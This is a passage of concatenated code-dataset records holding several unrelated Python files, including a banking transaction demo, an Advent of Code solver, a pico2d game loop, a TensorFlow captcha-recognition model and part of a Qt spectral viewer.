call\r\n the correct function or method, passing any parameters as needed.\r\n\r\n :param gtk.SpinButton button: the gtk.SpinButton() that called this\r\n method.\r\n :param int index: the index in the handler ID list of the callback\r\n signal associated with the gtk.SpinButton() that\r\n called this method.\r\n :return: False if successful or True is an error is encountered.\r\n :rtype: bool\r\n \"\"\"\r\n\r\n button.handler_block(self._lst_handler_id[index])\r\n\r\n if index == 4:\r\n self._testing_model.confidence = button.get_value() / 100.0\r\n self._modulebook.update(9, self._testing_model.confidence)\r\n elif index == 5:\r\n self._testing_model.consumer_risk = button.get_value()\r\n self._modulebook.update(10, self._testing_model.consumer_risk)\r\n elif index == 6:\r\n self._testing_model.producer_risk = button.get_value()\r\n self._modulebook.update(11, self._testing_model.producer_risk)\r\n\r\n button.handler_unblock(self._lst_handler_id[index])\r\n\r\n return False\r\n","sub_path":"rtk-RQA/rtk/testing/WorkBook.py","file_name":"WorkBook.py","file_ext":"py","file_size_in_byte":33157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"13371716","text":"from datetime import date\n\n\nclass Transaction:\n def __init__(self, amount, category, initial_amount):\n self.amount = amount\n self.category = category\n self.initial_amount = initial_amount\n self.date = date.today()\n\n @property\n def description(self):\n return f'Transaction date: {self.date} \\nTransaction category: {self.category}'\n\n\nclass Deposit(Transaction):\n def __init__(self, amount, category, tax_rate, initial_amount):\n Transaction.__init__(self, amount, category, initial_amount)\n self.tax_rate = tax_rate\n\n def calculate_tax(self):\n return self.tax_rate * self.amount * 0.01\n\n def process(self):\n return self.initial_amount + self.amount - self.calculate_tax()\n\n\nclass Withdrawal(Transaction):\n def __init__(self, amount, category, tax_rate, initial_amount):\n Transaction.__init__(self, amount, category, initial_amount)\n self.tax_rate = tax_rate\n\n def calculate_tax(self):\n return self.tax_rate * self.amount * 0.1\n\n def process(self):\n balance = self.initial_amount - self.amount - self.calculate_tax()\n if balance < 0:\n print('There is not enough money on your account')\n return self.initial_amount\n return balance\n\n\ntransaction = Transaction(20, 'salary', 100)\nprint(transaction.date)\nprint(transaction.category)\nprint(transaction.initial_amount)\nprint(transaction.description)\n\ndeposit = Deposit(33, 'bonus', 15, 100)\nprint(deposit.date)\nprint(deposit.category)\nprint(deposit.description)\nprint(deposit.process())\n\nwithdrawal = Withdrawal(33, 'fee', 5, 100)\nprint(withdrawal.date)\nprint(withdrawal.category)\nprint(withdrawal.description)\nprint(withdrawal.process())\n\nwithdrawal = Withdrawal(1000, 'city_tax', 5, 100)\nprint(withdrawal.date)\nprint(withdrawal.category)\nprint(withdrawal.description)\nprint(withdrawal.process())\n\n","sub_path":"transaction.py","file_name":"transaction.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"195402938","text":"from models.database import *\r\n\r\nclass BaseContact(db.Base):\r\n __tablename__ = 'contacts'\r\n id = Column(Integer, primary_key=True)\r\n fname = Column(String(255), nullable=False)\r\n lname = Column(String(255), nullable=False)\r\n email = Column(String(255), nullable=False)\r\n subject = Column(String(255), nullable=False)\r\n body = Column(Text(8192), nullable=False)\r\n timestamp = Column(TIMESTAMP, nullable=False)\r\n\r\n def create():\r\n if not db.engine.dialect.has_table(db.engine, 'contacts'):\r\n BaseContact.__table__.create(db.engine)\r\n\r\n\r\n def __repr__(self):\r\n return json.dumps({\r\n 'name': f'{self.fname} {self.lname}',\r\n 'email': self.email,\r\n 'subject': self.subject,\r\n 'body': self.body,\r\n 'timestamp': str(self.timestamp.strftime('%A %d %B %Y at %H:%M'))\r\n })\r\n\r\nclass Contact(BaseContact):\r\n \r\n def all():\r\n return db.session.query(Contact)\r\n\r\n \r\n def get(id):\r\n try:\r\n q = db.session.query(Contact).filter(Contact.id == id)\r\n return json.dumps({\r\n 'status': 'OK',\r\n 'code': 200,\r\n 'contact': repr(q[0])\r\n })\r\n except Exception as error:\r\n print(repr(error))\r\n \r\n return json.dumps({\r\n 'status': 'ERROR',\r\n 'code': 500,\r\n 'message': repr(error)\r\n })\r\n \r\n def add(data):\r\n try:\r\n contact = Contact(fname=data['fname'], lname=data['lname'], email=data['email'], \r\n subject=data['subject'], body=data['body'], timestamp=datetime.now())\r\n db.session.add(contact)\r\n db.session.commit()\r\n\r\n return json.dumps({\r\n 'status': 'OK',\r\n 'code': 200\r\n })\r\n except Exception as error:\r\n print(repr(error))\r\n\r\n db.session.rollback()\r\n\r\n return json.dumps({\r\n 'status': 'ERROR',\r\n 'code': 500,\r\n 'message': repr(error)\r\n })","sub_path":"cgi-bin/models/contact_model.py","file_name":"contact_model.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"7911806","text":"from collections import defaultdict\nimport re\n\nfactory = {\n 'bot': defaultdict(lambda: {'has': [], 'low': None, 'high': None}),\n 'output': defaultdict(lambda: {'has': []})\n}\n\ncomps = []\n\n\ndef get_target(target):\n t, i = target\n return factory[t][i]\n\n\ndef give(what, target):\n get_target(target)['has'].append(what)\n t, _ = target\n if t == 'bot' and len(get_target(target)['has']) == 2:\n l, h = tuple(sorted(get_target(target)['has'], key=lambda i: int(i)))\n give(l, get_target(target)['low'])\n give(h, get_target(target)['high'])\n get_target(target)['has'] = []\n comps.append((l, h, target))\n\n\ninput_commands = []\ndef handle_input_line(match):\n what, target = tuple(match.groups())\n target = tuple(target.split())\n input_commands.append((what, target))\n\n\ndef handle_bot_line(match):\n who, type1, target1, type2, target2 = match.groups()\n who = tuple(who.split())\n target1 = tuple(target1.split())\n target2 = tuple(target2.split())\n get_target(who)[type1] = target1\n get_target(who)[type2] = target2\n\n\nline_input_pattern = re.compile(r'value (.+) goes to (.+)')\nline_bot_pattern = re.compile(r'(.+) gives (.+) to (.+) and (.+) to (.+)')\ncommands = [(line_input_pattern, handle_input_line), (line_bot_pattern, handle_bot_line)]\n\nwith open('day10.txt') as file:\n for line in file:\n for command in commands:\n pattern, handler = command\n match = pattern.match(line.strip())\n if match is not None:\n handler(match)\n break\n\nfor input_command in input_commands:\n w, t = input_command\n give(w, t)\n\nfor comp in comps:\n l, h, b = comp\n if l == '17' and h == '61':\n print(comp)\n print('part I:', b[1])\n\nn = 1\nfor output in factory['output'].items():\n if output[0] in ['0', '1', '2']:\n print(output)\n n *= int(output[1]['has'][0])\nprint('part II:', n)\n","sub_path":"day10.py","file_name":"day10.py","file_ext":"py","file_size_in_byte":1937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"100586591","text":"import os\r\nimport random\r\nimport game_framework\r\nimport title_state\r\n\r\nfrom pico2d import *\r\nos.chdir('C:\\\\Temp\\\\lab01')\r\n\r\nrunning = True;\r\n\r\ndef handle_events():\r\n events = get_events()\r\n \r\n for event in events:\r\n if event.type == SDL_QUIT:\r\n game_framework.quit()\r\n elif event.type == SDL_KEYDOWN and event.key == SDLK_ESCAPE:\r\n game_framework.change_state(title_state)\r\n\r\n elif event.type == SDL_QUIT:\r\n running = False\r\n elif event.type == SDL_KEYDOWN and event.key == SDLK_ESCAPE:\r\n running = False\r\n\r\n elif event.type == SDL_MOUSEMOTION:\r\n boy.x, boy.y = event.x, 600 - event.y\r\n\r\n elif event.type == SDL_KEYDOWN and event.key == SDLK_1:\r\n team[0].x, team[0].y = boy.x, boy.y\r\n\r\n elif event.type == SDL_KEYDOWN and event.key == SDLK_2:\r\n team[1].x, team[1].y = boy.x, boy.y\r\n\r\n elif event.type == SDL_KEYDOWN and event.key == SDLK_3:\r\n team[2].x, team[2].y = boy.x, boy.y\r\n\r\n elif event.type == SDL_KEYDOWN and event.key == SDLK_4:\r\n team[3].x, team[3].y = boy.x, boy.y\r\n\r\n elif event.type == SDL_KEYDOWN and event.key == SDLK_5:\r\n team[4].x, team[4].y = boy.x, boy.y\r\n\r\n elif event.type == SDL_KEYDOWN and event.key == SDLK_6:\r\n team[5].x, team[5].y = boy.x, boy.y\r\n\r\n elif event.type == SDL_KEYDOWN and event.key == SDLK_7:\r\n team[6].x, team[6].y = boy.x, boy.y\r\n\r\n elif event.type == SDL_KEYDOWN and event.key == SDLK_8:\r\n team[7].x, team[7].y = boy.x, boy.y\r\n\r\n elif event.type == SDL_KEYDOWN and event.key == SDLK_9:\r\n team[8].x, team[8].y = boy.x, boy.y\r\n\r\n elif event.type == SDL_KEYDOWN and event.key == SDLK_0:\r\n team[9].x, team[9].y = boy.x, boy.y\r\n\r\n elif event.type == SDL_KEYDOWN and event.key == SDLK_F1:\r\n team[10].x, team[10].y = boy.x, boy.y\r\n\r\ndef enter():\r\n open_canvas()\r\n global boy, grass, team\r\n boy = Boy()\r\n boy1 = Boy()\r\n boy2 = Boy()\r\n boy3 = Boy()\r\n boy4 = Boy()\r\n boy5 = Boy()\r\n boy6 = Boy()\r\n boy7 = Boy()\r\n boy8 = Boy()\r\n boy9 = Boy()\r\n boy10 = Boy()\r\n boy11 = Boy()\r\n team = [boy1, boy2, boy3, boy4, boy5, boy6, boy7, boy8, boy9, boy10, boy11]\r\n grass = Grass()\r\n\r\ndef exit():\r\n clear_canvas()\r\n global boy, grass\r\n del(boy)\r\n del(grass)\r\n\r\n\r\nclass Grass:\r\n def __init__(self):\r\n self.image = load_image('grass.png')\r\n\r\n def draw(self):\r\n self.image.draw(400, 30)\r\n\r\nclass Boy:\r\n\r\n image = None\r\n\r\n LEFT_RUN, RIGHT_RUN = 0, 1\r\n\r\n def __init__(self):\r\n self.x, self.y = random.randint(100, 700), random.randint(90, 500)\r\n self.frame = random.randint(0, 7)\r\n self.dir = 1\r\n self.state = self.RIGHT_RUN\r\n\r\n if Boy.image == None:\r\n Boy.image = load_image('animation_sheet.png')\r\n\r\n def update(self):\r\n if self.state == self.RIGHT_RUN:\r\n self.frame = (self.frame+1)%8\r\n self.x += (self.dir * 5)\r\n self.image.clip_draw()\r\n\r\n if self.x > 800:\r\n self.dir = -1\r\n self.x = 800\r\n self.state = self.LEFT_RUN\r\n\r\n if self.state == self.LEFT_RUN:\r\n self.frame = (self.frame + 1)%8\r\n self.x += (self.dir * 5)\r\n self.image.clip_draw()\r\n\r\n if self.x < 0:\r\n self.dir = 1\r\n self.x = 0\r\n self.state = self.RIGHT_RUN\r\n\r\n\r\n def draw(self):\r\n self.image.clip_draw(self.frame*100, self.state * 100, 100, 100, self.x, self.y)\r\n\r\n\r\ndef update():\r\n for boy in team:\r\n boy.update()\r\n\r\ndef draw():\r\n clear_canvas()\r\n grass.draw()\r\n for boy in team:\r\n boy.draw()\r\n update_canvas()\r\n delay(0.05)\r\n\r\ndef main():\r\n enter()\r\n\r\n while running:\r\n handle_events()\r\n update()\r\n draw()\r\n\r\n exit()\r\n\r\nif __name__ == '__main__':\r\n main()","sub_path":"10.11 과제/main_state.py","file_name":"main_state.py","file_ext":"py","file_size_in_byte":3996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"623617327","text":"import pandas as pd\nfrom sklearn.metrics import log_loss, roc_auc_score\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import LabelEncoder, MinMaxScaler\n\nfrom ctr_model.models import WDL\nfrom ctr_model.inputs import SparseFeat, DenseFeat, get_feature_names\n\nimport torch\n\nif __name__ == \"__main__\":\n data = pd.read_csv('dataset/criteo_sampled_data.csv')\n\n sparse_features = ['C'+ str(i) for i in range(1, 27)]\n dense_features = ['I'+ str(i) for i in range(1, 14)]\n\n # 补充缺失值\n data[sparse_features] = data[sparse_features].fillna('-1', )\n data[dense_features] = data[dense_features].fillna(0, )\n target = ['label']\n\n # sparse -> label dense -> 0~1\n for feat in sparse_features:\n lbe = LabelEncoder()\n data[feat] = lbe.fit_transform(data[feat])\n\n mms = MinMaxScaler(feature_range=(0, 1))\n data[dense_features] = mms.fit_transform(data[dense_features])\n\n # count #unique features for each sparse field,and record dense feature field name\n feature_columns = [SparseFeat(feat, data[feat].unique()) for feat in sparse_features] + \\\n [DenseFeat(feat,1,) for feat in dense_features]\n\n dnn_feature_columns = feature_columns\n linear_feature_columns = feature_columns\n\n feature_names = get_feature_names(linear_feature_columns + dnn_feature_columns)\n\n # generate train and eval data for model\n train, test = train_test_split(data, test_size=0.2)\n train_model_input = [train[name] for name in feature_names]\n test_model_input = [test[name] for name in feature_names]\n\n # define model, tarin, eval, predict\n device = \"cpu\"\n use_cuda = True\n if use_cuda and torch.cuda.is_available():\n print(\"cuda ready\")\n device = 'cuda:0'\n\n model = WDL(linear_feature_columns, dnn_feature_columns,task='binary',\n l2_reg_embedding=1e-5,l2_reg_linear=1e-5,l2_reg_dnn=0,device=device)\n\n model.compile(\"adagrad\", \"binary_crossentropy\", metrics=[\"binary_crossentropy\", \"auc\"], )\n model.fit(train_model_input, train[target].values, batch_size=256, epochs=10, validation_split=0.2, verbose=2)\n\n pred_ans = model.predict(test_model_input, 256)\n\n print(\"test logloss\", round(log_loss(test[target].values, pred_ans), 4))\n print(\"test AUC\", round(roc_auc_score(test[target].values, pred_ans), 4))","sub_path":"test/wdl_test.py","file_name":"wdl_test.py","file_ext":"py","file_size_in_byte":2360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"243653825","text":"import tensorflow as tf\n\n# captcha infos\nnumber = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\nalphabet = ['a', 'b', 'c', 'd', 'e', 'f']\n\nchar_set = number + alphabet\nCHAR_SET_LEN = len(char_set)\n\ntf.logging.set_verbosity(tf.logging.INFO)\nflags = tf.app.flags\nflags.DEFINE_integer('num_epochs', 20, 'Number of traning epochs')\nflags.DEFINE_integer('batch_size', 64, 'Batch size')\nflags.DEFINE_float('learning_rate', 0.001, 'Learning rate')\nflags.DEFINE_float('dropout_rate', 0.75, 'Dropout rate')\nflags.DEFINE_string('train_dataset', 'captcha_train.tfrecords', 'Filename of train dataset')\nflags.DEFINE_string('valid_dataset', 'captcha_valid.tfrecords', 'Filename of valid dataset')\nflags.DEFINE_string('model_dir', 'trained_model/lenet_captcha', 'Filename of model ')\n\nflags.DEFINE_integer('CHAR_SET_LEN', CHAR_SET_LEN, 'Range of the words in captcha')\nflags.DEFINE_integer('MAX_CAPTCHA', 4, 'Lengh of the captcha')\nflags.DEFINE_integer('IMAGE_HEIGHT', 34, 'Height of the captcha image')\nflags.DEFINE_integer('IMAGE_WIDTH', 66, 'Width of the captcha image')\nflags.DEFINE_integer('IMAGE_CHANNELS', 1, 'Channels of the captcha image')\nFLAGS = flags.FLAGS\n\n\n# 定义模型函数\n# 该函数需要返回一个定义好的tf.estimator.EstimatorSpec对象,对于不同的mode,提供的参数不一样\n# 训练模式,即 mode == tf.estimator.ModeKeys.TRAIN,必须提供的是 loss 和 train_op。\n# 验证模式,即 mode == tf.estimator.ModeKeys.EVAL,必须提供的是 loss。\n# 预测模式,即 mode == tf.estimator.ModeKeys.PREDICT,必须提供的是 predicitions。\ndef lenet_model_fn(features, labels, mode):\n # 输入层\n x = tf.reshape(features, shape=[-1, FLAGS.IMAGE_HEIGHT, FLAGS.IMAGE_WIDTH, FLAGS.IMAGE_CHANNELS], name=\"x_input\")\n\n # 卷积层1\n x = tf.layers.conv2d(inputs=x, filters=32, kernel_size=[3, 3],\n padding='same', activation=tf.nn.relu, name='conv1')\n # 池化层1\n x = tf.layers.max_pooling2d(inputs=x, pool_size=[2, 2], strides=2,\n padding='same', name='pool1')\n # drop out1\n x = tf.layers.dropout(inputs=x, rate=FLAGS.dropout_rate, name='dropout1')\n\n # 卷积层2\n x = tf.layers.conv2d(inputs=x, filters=64, kernel_size=[3, 3],\n padding='same', activation=tf.nn.relu, name='conv2')\n # 池化层2\n x = tf.layers.max_pooling2d(inputs=x, pool_size=[2, 2], strides=2,\n padding='same', name='pool2')\n # drop out2\n x = tf.layers.dropout(inputs=x, rate=FLAGS.dropout_rate, name='dropout2')\n\n # 卷积层3\n x = tf.layers.conv2d(inputs=x, filters=128, kernel_size=[3, 3],\n padding='same', activation=tf.nn.relu, name='conv3')\n # 池化层3\n x = tf.layers.max_pooling2d(inputs=x, pool_size=[2, 2], strides=2,\n padding='same', name='pool3')\n # drop out3\n x = tf.layers.dropout(inputs=x, rate=FLAGS.dropout_rate, name='dropout3')\n\n # 全连接层1\n x = tf.reshape(x, [-1, 5 * 9 * 128])\n x = tf.layers.dense(inputs=x, units=1024, activation=tf.nn.relu, name='dense')\n\n # drop out3\n x = tf.layers.dropout(inputs=x, rate=FLAGS.dropout_rate, name='dropout4')\n\n logits = tf.layers.dense(inputs=x, units=FLAGS.MAX_CAPTCHA * FLAGS.CHAR_SET_LEN, name='final')\n\n # 预测\n predictions = {\n 'x_predict': tf.reshape(logits, [-1, FLAGS.MAX_CAPTCHA, FLAGS.CHAR_SET_LEN], name=\"x_predict\")\n }\n\n if mode == tf.estimator.ModeKeys.PREDICT:\n return tf.estimator.EstimatorSpec(mode=mode, predictions=predictions)\n\n # 计算loss(对于train和valid模式)\n loss1 = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=logits[:, 0:16], labels=labels[:, 0:16]))\n loss2 = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=logits[:, 16:32], labels=labels[:, 16:32]))\n loss3 = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=logits[:, 32:48], labels=labels[:, 32:48]))\n loss4 = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=logits[:, 48:], labels=labels[:, 48:]))\n loss = (loss1 + loss2 + loss3 + loss4) / 4.0\n\n # 评估方法\n max_idx_p = tf.argmax(predictions['x_predict'], 2)\n max_idx_l = tf.argmax(tf.reshape(labels, [-1, FLAGS.MAX_CAPTCHA, FLAGS.CHAR_SET_LEN]), 2)\n\n correct_pred = tf.equal(max_idx_p, max_idx_l)\n batch_acc = tf.reduce_mean(tf.cast(correct_pred, tf.float32))\n\n # 为了打印训练中的结果\n accuracy, update_op = tf.metrics.accuracy(\n labels=max_idx_p, predictions=max_idx_l, name='accuracy'\n )\n\n tf.summary.scalar('batch_acc', batch_acc)\n tf.summary.scalar('streaming_acc', update_op)\n\n # 训练配置(对于train模式)\n if mode == tf.estimator.ModeKeys.TRAIN:\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n optimizer = tf.train.AdamOptimizer(learning_rate=FLAGS.learning_rate)\n with tf.control_dependencies(update_ops):\n train_op = optimizer.minimize(loss=loss, global_step=tf.train.get_global_step())\n\n return tf.estimator.EstimatorSpec(mode=mode, loss=loss, train_op=train_op)\n\n eval_metric_ops = {\n 'accuracy': (accuracy, update_op)\n }\n\n return tf.estimator.EstimatorSpec(mode=mode, loss=loss, eval_metric_ops=eval_metric_ops)\n\n\n# 用于解析tfrecords数据\ndef _parse_function(proto):\n features = {'label0': tf.FixedLenFeature([], tf.int64),\n 'label1': tf.FixedLenFeature([], tf.int64),\n 'label2': tf.FixedLenFeature([], tf.int64),\n 'label3': tf.FixedLenFeature([], tf.int64),\n 'image_encoded': tf.FixedLenFeature([], tf.string, default_value='')}\n\n parsed_feature = tf.parse_single_example(proto, features)\n image = tf.image.decode_image(parsed_feature['image_encoded'], channels=FLAGS.IMAGE_CHANNELS)\n image = tf.reshape(image, [FLAGS.IMAGE_HEIGHT, FLAGS.IMAGE_WIDTH, FLAGS.IMAGE_CHANNELS])\n image = tf.cast(image, dtype=tf.float32) # 像素值需转换为float,后面送入卷积层参与计算\n image = tf.divide(tf.subtract(image, 128.0), 128.0) # 图片标准化\n\n image_label0 = tf.cast(parsed_feature['label0'], tf.int32) # 首先转为整型,再进行one hot编码\n image_label1 = tf.cast(parsed_feature['label1'], tf.int32)\n image_label2 = tf.cast(parsed_feature['label2'], tf.int32)\n image_label3 = tf.cast(parsed_feature['label3'], tf.int32)\n\n image_label0 = tf.one_hot(image_label0, depth=FLAGS.CHAR_SET_LEN, axis=0) # axis=0和1是一样的效果\n image_label1 = tf.one_hot(image_label1, depth=FLAGS.CHAR_SET_LEN, axis=0)\n image_label2 = tf.one_hot(image_label2, depth=FLAGS.CHAR_SET_LEN, axis=0)\n image_label3 = tf.one_hot(image_label3, depth=FLAGS.CHAR_SET_LEN, axis=0)\n\n image_label = tf.concat([image_label0, image_label1, image_label2, image_label3], axis=0)\n\n return image, image_label\n\n\ndef main(unused_argv):\n # 读取训练数据集\n def train_input_fn():\n '''\n 训练输入函数,返回一个batch的features和labels\n :return:\n '''\n train_dataset = tf.data.TFRecordDataset(FLAGS.train_dataset)\n train_dataset = train_dataset.map(_parse_function, num_parallel_calls=8)\n train_dataset = train_dataset.repeat(FLAGS.num_epochs)\n train_dataset = train_dataset.batch(FLAGS.batch_size)\n train_iterator = train_dataset.make_one_shot_iterator()\n features, labels = train_iterator.get_next()\n\n return features, labels\n\n # 读取验证数据集\n def valid_input_fn():\n '''\n 验证输入函数,返回一个batch的features和labels\n :return:\n '''\n valid_dataset = tf.data.TFRecordDataset(FLAGS.valid_dataset)\n valid_dataset = valid_dataset.map(_parse_function, num_parallel_calls=8)\n # valid_dataset = valid_dataset.repeat(FLAGS.num_epochs)\n valid_dataset = valid_dataset.batch(FLAGS.batch_size)\n valid_dataset = valid_dataset.make_one_shot_iterator()\n features, labels = valid_dataset.get_next()\n\n return features, labels\n\n # run模型\n classifier_ = tf.estimator.Estimator(\n model_fn=lenet_model_fn, model_dir=FLAGS.model_dir\n )\n\n classifier_.train(input_fn=train_input_fn)\n valid_results = classifier_.evaluate(input_fn=valid_input_fn)\n print(valid_results)\n\n\nif __name__ == \"__main__\":\n tf.app.run()\n","sub_path":"cnn_tensorflow/train_estimator.py","file_name":"train_estimator.py","file_ext":"py","file_size_in_byte":8422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"529153646","text":"from __future__ import (absolute_import, division, print_function,\n unicode_literals)\n\nfrom ..third_party.qtpy.QtCore import *\nfrom ..third_party.qtpy.QtWidgets import *\nfrom ..third_party.qtpy.QtGui import *\n\nfrom .qt.mainwindow import Ui_MainWindow\nfrom .widgets.sub_windows import PlotSubWindow\nfrom .widgets.dialogs import LayerArithmeticDialog\nfrom .widgets.menus import LayerContextMenu\nfrom ..core.comms import Dispatch, DispatchHandle\nfrom ..core.annotation import LineIDMarker\n\n\nclass Viewer(QMainWindow):\n \"\"\"\n The `Viewer` is the main construction area for all GUI widgets. This\n object does **not** control the interactions between the widgets,\n but only their creation and placement.\n \"\"\"\n def __init__(self, parent=None):\n super(Viewer, self).__init__(parent)\n self._current_sub_window = None\n\n self.main_window = Ui_MainWindow()\n self.main_window.setupUi(self)\n self.wgt_data_list = self.main_window.listWidget\n self.wgt_layer_list = self.main_window.treeWidget_2\n self.wgt_model_list = self.main_window.treeWidget\n self.wgt_model_list.setHeaderLabels([\"Parameter\", \"Value\"])\n\n # Setup\n self._setup_connections()\n\n # Context menus\n self.wgt_layer_list.setContextMenuPolicy(Qt.CustomContextMenu)\n self.layer_context_menu = LayerContextMenu()\n\n self.wgt_model_list.setContextMenuPolicy(Qt.CustomContextMenu)\n\n # Define the layer arithmetic dialog\n self._layer_arithmetic_dialog = LayerArithmeticDialog()\n\n # Setup event handler\n DispatchHandle.setup(self)\n\n def _setup_connections(self):\n # Listen for subwindow selection events, update layer list on selection\n self.main_window.mdiArea.subWindowActivated.connect(\n self._set_current_sub_window)\n\n # When a user edits the model parameter field, validate the input\n self.wgt_model_list.itemChanged.connect(\n self._model_parameter_validation)\n\n @DispatchHandle.register_listener(\"on_selected_layer\")\n def _set_model_tool_options(self, layer_item):\n if layer_item is None:\n self.main_window.createModelLayerButton.hide()\n self.main_window.updateModelLayerButton.hide()\n self.main_window.fittingRoutinesGroupBox.setEnabled(False)\n self.main_window.loadModelButton.setEnabled(False)\n self.main_window.saveModelButton.setEnabled(False)\n self.main_window.exportModelButton.setEnabled(False)\n\n return\n\n layer = layer_item.data(0, Qt.UserRole)\n\n if not hasattr(layer, 'model'):\n self.main_window.createModelLayerButton.show()\n self.main_window.updateModelLayerButton.hide()\n self.main_window.fittingRoutinesGroupBox.setEnabled(False)\n self.main_window.saveModelButton.setEnabled(False)\n self.main_window.exportModelButton.setEnabled(False)\n self.main_window.loadModelButton.setEnabled(True)\n else:\n self.main_window.createModelLayerButton.hide()\n self.main_window.updateModelLayerButton.show()\n self.main_window.fittingRoutinesGroupBox.setEnabled(True)\n self.main_window.saveModelButton.setEnabled(True)\n self.main_window.exportModelButton.setEnabled(True)\n self.main_window.loadModelButton.setEnabled(False)\n\n def _set_current_sub_window(self, sub_window):\n sub_window = sub_window or self.main_window.mdiArea.currentSubWindow()\n\n if sub_window is None:\n sub_window = self.main_window.mdiArea.activatePreviousSubWindow()\n\n if self._current_sub_window != sub_window:\n self._current_sub_window = sub_window\n Dispatch.on_selected_window.emit(window=self._current_sub_window)\n\n @property\n def current_data(self):\n \"\"\"\n Returns the currently selected data object from the data list widget.\n\n Returns\n -------\n data : specviz.core.data.Data\n The `Data` object of the currently selected row.\n \"\"\"\n data_item = self.wgt_data_list.currentItem()\n\n if data_item is not None:\n data = data_item.data(Qt.UserRole)\n return data\n\n @property\n def current_layer(self):\n \"\"\"\n Returns the currently selected layer object form the layer list widget.\n\n Returns\n -------\n layer : specviz.core.data.Layer\n The `Layer` object of the currently selected row.\n \"\"\"\n layer_item = self.wgt_layer_list.currentItem()\n\n if layer_item is not None:\n layer = layer_item.data(0, Qt.UserRole)\n\n return layer\n\n @property\n def current_layer_item(self):\n return self.wgt_layer_list.currentItem()\n\n @property\n def current_model_item(self):\n return self.wgt_model_list.currentItem()\n\n @property\n def current_sub_window(self):\n \"\"\"\n Returns the currently active `PlotSubWindow` object.\n\n Returns\n -------\n sub_window : PlotSubWindow\n The currently active `PlotSubWindow` object.\n \"\"\"\n if self._current_sub_window is not None:\n return self._current_sub_window.widget()\n\n @property\n def current_model(self):\n return self.main_window.modelsComboBox.currentText()\n\n @property\n def current_fitter(self):\n return self.main_window.fittingRoutinesComboBox.currentText()\n\n @property\n def current_model_formula(self):\n return self.main_window.lineEdit.text()\n\n def add_sub_window(self, *args, **kwargs):\n \"\"\"\n Creates a new sub window instance in the MDI area.\n\n Returns\n -------\n new_sub_window : QMdiSubWindow\n The MdiSubWindow Qt instance.\n wgt_sub_window : QWidget\n The widget object within the QMdiSubWindow.\n \"\"\"\n # Create new window\n plot_sub_window = PlotSubWindow()\n\n new_sub_window = self.main_window.mdiArea.addSubWindow(plot_sub_window)\n new_sub_window.show()\n\n return plot_sub_window\n\n def open_file_dialog(self, filters):\n \"\"\"\n Given a list of filters, prompts the user to select an existing file\n and returns the file path and filter.\n\n Parameters\n ----------\n filters : list\n List of filters for the dialog.\n\n Returns\n -------\n file_name : str\n Path to the selected file.\n selected_filter : str\n The chosen filter (this indicates which custom loader from the\n registry to use).\n \"\"\"\n dialog = QFileDialog(self)\n dialog.setFileMode(QFileDialog.ExistingFile)\n dialog.setNameFilters([x for x in filters])\n\n if dialog.exec_():\n file_names = dialog.selectedFiles()\n selected_filter = dialog.selectedNameFilter()\n\n return file_names[0], selected_filter\n\n return None, None\n\n @DispatchHandle.register_listener(\"on_added_data\")\n def add_data_item(self, data):\n \"\"\"\n Adds a `Data` object to the loaded data list widget.\n\n Parameters\n ----------\n data : specviz.core.data.Data\n The `Data` object to add to the list widget.\n \"\"\"\n new_item = QListWidgetItem(data.name, self.wgt_data_list)\n new_item.setFlags(new_item.flags() | Qt.ItemIsEditable)\n\n new_item.setData(Qt.UserRole, data)\n\n self.wgt_data_list.setCurrentItem(new_item)\n\n @DispatchHandle.register_listener(\"on_removed_data\")\n def remove_data_item(self, data):\n data_item = self.get_data_item(data)\n\n self.wgt_data_list.takeItem(self.wgt_data_list.row(data_item))\n\n def get_data_item(self, data):\n for i in range(self.wgt_data_list.count()):\n data_item = self.wgt_data_list.item(0)\n\n if data_item.data(Qt.UserRole) == data:\n return data_item\n\n @DispatchHandle.register_listener(\"on_added_layer\")\n def add_layer_item(self, layer, unique=True):\n \"\"\"\n Adds a `Layer` object to the loaded layer list widget.\n\n Parameters\n ----------\n layer : specviz.core.data.Layer\n The `Layer` object to add to the list widget.\n \"\"\"\n # Make sure there is only one item per layer object\n if unique:\n if self.get_layer_item(layer) is not None:\n return\n\n new_item = QTreeWidgetItem(self.get_layer_item(layer._parent) or\n self.wgt_layer_list)\n new_item.setFlags(new_item.flags() | Qt.ItemIsUserCheckable | Qt.ItemIsEditable)\n new_item.setText(0, layer.name)\n new_item.setData(0, Qt.UserRole, layer)\n new_item.setCheckState(0, Qt.Checked)\n\n self.wgt_layer_list.setCurrentItem(new_item)\n\n def get_layer_item(self, layer):\n root = self.wgt_layer_list.invisibleRootItem()\n\n for i in range(root.childCount()):\n child = root.child(i)\n\n if child.data(0, Qt.UserRole) == layer:\n return child\n\n for j in range(child.childCount()):\n sec_child = child.child(j)\n\n if sec_child.data(0, Qt.UserRole) == layer:\n return sec_child\n\n @DispatchHandle.register_listener(\"on_removed_layer\")\n def remove_layer_item(self, layer):\n root = self.wgt_layer_list.invisibleRootItem()\n\n for i in range(root.childCount()):\n child = root.child(i)\n\n if child.data(0, Qt.UserRole) == layer:\n root.removeChild(child)\n break\n\n for j in range(child.childCount()):\n sec_child = child.child(j)\n\n if sec_child.data(0, Qt.UserRole) == layer:\n child.removeChild(sec_child)\n break\n\n @DispatchHandle.register_listener(\"on_added_plot\", \"on_updated_plot\")\n def update_layer_item(self, container=None, *args, **kwargs):\n if container is None:\n return\n\n layer = container._layer\n pixmap = QPixmap(10, 10)\n pixmap.fill(container.pen.color())\n 